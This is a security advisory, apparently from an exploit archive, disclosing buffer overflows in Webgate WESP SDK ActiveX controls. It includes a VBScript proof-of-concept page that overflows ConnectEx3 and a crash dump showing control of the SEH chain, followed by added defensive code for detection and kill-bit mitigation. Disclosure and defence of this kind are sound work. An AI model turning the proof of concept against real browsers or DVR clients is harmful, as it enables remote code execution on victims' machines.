Webgate Buffer Overflow
Posted Feb 24, 2015
Authored by Praveen Darshanam

Several Webgate WESP SDK ActiveX controls suffer from multiple buffer overflow vulnerabilities.

tags | exploit, overflow, vulnerability
SHA-256 | 6d6a87e39a520ec98120ccff8b68f26b54ef6465769b821e910397fd5a27aa7e

Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real-time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.

WEBGATE Embedded Standard Protocol (WESP) SDK supports the same tools in both
network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow


CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As
String , ByVal Port As Integer , ByVal UserID As String , ByVal Password
As String , ByVal extcompany As Long , ByVal authType As Long , ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
******************************
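The following detection scanner is an added example and is not part of the advisory or of Webgate's code. It flags web content that instantiates one of the WESP SDK controls named above (the CLSID is the one from the PoC; the ProgIDs and method names are taken from the vulnerability list) and then calls one of the listed methods with an oversized string argument. The regular expressions, the 256-character threshold and the two constructed sample pages are this example's own assumptions; such a check would sit in a web proxy, mail gateway or IDS content rule.

```python
"""Scan HTML/VBScript content for instantiation of the WESP SDK ActiveX controls
named in the advisory, followed by a call to one of the affected methods with a
long string argument. Added example; thresholds and regexes are assumptions."""
import re

# Indicators taken from the advisory: CLSID from the PoC, ProgIDs/methods from the list.
WESP_CLSIDS = {"4E14C449-A61A-4BF7-8082-65A91298A6D8"}  # WESPPLAYBACKLib.WESPPlaybackCtrl
WESP_PROGIDS = {
    "WESPMONITORLib.WESPMonitorCtrl",
    "WESPCONFIGLib.UserItem",
    "WESPSERIALPORTLib.WESPSerialPortCtrl",
    "WESPCONFIGLib.IDList",
    "WESPPLAYBACKLib.WESPPlaybackCtrl",
}
WESP_METHODS = {"LoadImage", "LoadImageEx", "ChangePassword", "Connect", "ConnectEx3", "AddID"}

# Assumed threshold: string arguments at least this long are treated as suspicious.
LONG_STRING = 256

_OBJECT_RE = re.compile(r"<object[^>]*classid\s*=\s*['\"]?clsid:([0-9a-f-]+)", re.I)
_PROGID_RE = re.compile(r"\b(" + "|".join(re.escape(p) for p in WESP_PROGIDS) + r")\b", re.I)
# Longest names first so "ConnectEx3" is not reported as "Connect".
_METHOD_RE = re.compile(r"\.(" + "|".join(sorted(WESP_METHODS, key=len, reverse=True)) + r")\b")
_STRING_FN_RE = re.compile(r"\bString\s*\(\s*(\d+)\s*,", re.I)      # VBScript String(n, ch)
_LITERAL_RE = re.compile(r"[\"']([^\"'\n]{%d,})[\"']" % LONG_STRING)  # long quoted literal


def scan_html(html):
    """Return a list of (kind, value) findings for the given page content."""
    findings = []
    for m in _OBJECT_RE.finditer(html):
        clsid = m.group(1).upper()
        if clsid in WESP_CLSIDS:
            findings.append(("clsid", clsid))
    for m in _PROGID_RE.finditer(html):
        findings.append(("progid", m.group(1)))
    for m in _METHOD_RE.finditer(html):
        findings.append(("method", m.group(1)))
    for m in _STRING_FN_RE.finditer(html):
        n = int(m.group(1))
        if n >= LONG_STRING:
            findings.append(("long_string", n))
    for m in _LITERAL_RE.finditer(html):
        findings.append(("long_literal", len(m.group(1))))
    return findings


def is_suspicious(html):
    """True when a WESP control is instantiated, an affected method is called,
    and at least one string argument is oversized."""
    kinds = {kind for kind, _ in scan_html(html)}
    has_control = bool({"clsid", "progid"} & kinds)
    has_long_arg = bool({"long_string", "long_literal"} & kinds)
    return has_control and "method" in kinds and has_long_arg


# Constructed sample pages (not captured traffic) for demonstration.
SAMPLE_TRIGGER = """<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'></object>
<script language='vbscript'>
arg2=String(1044, "A")
target.ConnectEx3 1, arg2, 1, "u", "p", 1, 1, "x"
</script></html>"""

SAMPLE_BENIGN = """<html>
<object classid='clsid:00000000-0000-0000-0000-000000000000' id='other'></object>
<script language='vbscript'>other.Connect "dvr.example", 80</script></html>"""

if __name__ == "__main__":
    for name, page in (("trigger", SAMPLE_TRIGGER), ("benign", SAMPLE_BENIGN)):
        print(name, is_suspicious(page), scan_html(page))
```

The benign sample calls a `Connect` method on an unrelated control with short arguments, so it is not flagged; a match requires the control, the method and the oversized argument together, which keeps the rule from firing on ordinary pages that merely mention one of the ProgIDs.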
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From Returns To
--------------------------------------------------
msvcrt.76ACD33D WESPPlayback.999539
WESPPlayback.999539 41414141
41414141 22E5E0
22E5E0 2F712C
2F712C 41414141
41414141 41414141
41414141 41414141
41414141 41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX] <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]

P.S. CERT tried to coordinate with the vendor to fix the issues, but
there was no response from the vendor.
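With no vendor fix available, the standard mitigation for a vulnerable ActiveX control is to set its kill bit so Internet Explorer refuses to instantiate it. The script below is an added example, not part of the advisory: it writes a `.reg` file that sets `COMPATFLAG_KILLBIT` (0x400) in the `Compatibility Flags` value under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}` (and the `Wow6432Node` path for 32-bit IE on 64-bit Windows). Only the WESPPlayback CLSID appears in the advisory; the CLSIDs of the other listed controls are not given and must be read from the installed type libraries before adding them here.

```python
"""Generate a .reg file that sets the ActiveX kill bit for given CLSIDs.
Added example, not from the advisory. Only the WESPPlayback CLSID is known
from the PoC; other WESP control CLSIDs must be supplied by the reader."""
import re

KILL_BIT = 0x400  # COMPATFLAG_KILLBIT
BASE_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
)
WESP_PLAYBACK_CLSID = "4E14C449-A61A-4BF7-8082-65A91298A6D8"  # from the advisory PoC

_CLSID_RE = re.compile(r"^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$")


def normalize_clsid(clsid):
    """Accept '{...}' or bare, any case; return '{UPPERCASE-CLSID}' or raise ValueError."""
    c = clsid.strip().strip("{}").upper()
    if not _CLSID_RE.match(c):
        raise ValueError("not a CLSID: %r" % clsid)
    return "{%s}" % c


def kill_bit_reg(clsids, flags=KILL_BIT):
    """Return the text of a .reg file setting Compatibility Flags for each CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        key = normalize_clsid(clsid)
        for base in BASE_KEYS:
            lines.append("[%s\\%s]" % (base, key))
            lines.append('"Compatibility Flags"=dword:%08x' % flags)
            lines.append("")
    return "\r\n".join(lines)


def kill_bit_set(clsid):
    """Windows-only check: True if the kill bit is already set for the CLSID."""
    import winreg  # imported here so the module loads on non-Windows hosts
    key = normalize_clsid(clsid)
    for base in BASE_KEYS:
        subkey = base.split("\\", 1)[1] + "\\" + key  # strip the HKEY_LOCAL_MACHINE prefix
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as k:
                value, _ = winreg.QueryValueEx(k, "Compatibility Flags")
                if value & KILL_BIT:
                    return True
        except OSError:
            continue
    return False


if __name__ == "__main__":
    with open("wesp-killbit.reg", "w", newline="") as fh:
        fh.write(kill_bit_reg([WESP_PLAYBACK_CLSID]))
    print("wrote wesp-killbit.reg")
```

Import the generated file with `reg import wesp-killbit.reg` from an elevated prompt, then confirm with `kill_bit_set(WESP_PLAYBACK_CLSID)` on the Windows host; the `.reg` text uses CRLF line endings and an eight-digit hex dword, which is what the Registry Editor expects.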

Best Regards,
Praveen Darshanam

